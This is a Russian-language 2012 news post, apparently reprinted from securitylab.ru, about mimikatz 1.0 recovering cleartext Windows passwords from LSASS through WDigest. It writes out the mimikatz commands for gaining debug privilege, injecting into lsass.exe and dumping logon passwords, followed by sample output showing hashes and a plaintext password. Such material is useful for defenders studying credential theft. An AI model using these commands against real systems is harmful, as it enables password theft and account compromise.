You are hereГруппы / Безопасность / Обнаружена опасная уязвимость в Microsoft Windows

Обнаружена опасная уязвимость в Microsoft Windows


By yuliya - Posted on 22 февраля 2012

Картинка: 
уязвимость,  Windows,  кража данных

Локальный пользователь может получить доступ к потенциально важным данным.

Исследователь "швейцарский нож" недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.

Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.

Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

Вывод будет примерно следующим:

mimikatz # privilege::debug
Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 680
Attente de connexion du client...
Serveur connecte a un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des donnees de securites dans LSASS

mimikatz # @getLogonPasswords

Authentification Id : 0;248844
Package d'authentification : NTLM
Utilisateur principal : ANONYMOUS LOGON
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
tspkg : n.t. (LUID KO)

Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : PC01$
Domaine d'authentification : WORKGROUP
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)

Authentification Id : 0;575543
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : PC01
msv1_0 : lm{ 336dcb9831c8a03dka9872550c3cee6 }, ntlm{ 76af46e798f45ceb87805ba95380b39ed }
wdigest : password
tspkg : password

Authentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)

Authentification Id : 0;62105
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
tspkg : n.t. (LUID KO)

Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : PC01$
Domaine d'authentification : WORKGROUP
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)
mimikatz #

Функционал mimikatz в настоящий момент внедряется в Metasploit Framework, и может быть взят на вооружение многими исследователями безопасности.

securitylab.ru

Отправить комментарий

  • Строки и параграфы переносятся автоматически.
  • Доступны HTML теги: <ul> <ol> <li> <dl> <dt> <dd> <b> <i> <p> <center> <br>

CAPTCHA
Вы, случаем, не робот?

Уведомления группы

Предложения групп RSS лента. Или подписаться на эти персонализированные, общесайтовые каналы:

Сейчас на сайте

Сейчас на сайте 0 пользователей и 104 гостя.

Последние комментарии